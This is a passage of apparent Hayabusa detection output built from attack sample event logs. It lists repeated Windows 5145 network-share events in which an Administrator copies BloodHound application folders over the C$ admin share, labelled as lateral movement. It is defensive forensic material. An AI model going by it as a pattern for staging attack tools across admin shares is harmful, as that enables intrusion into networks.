Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : 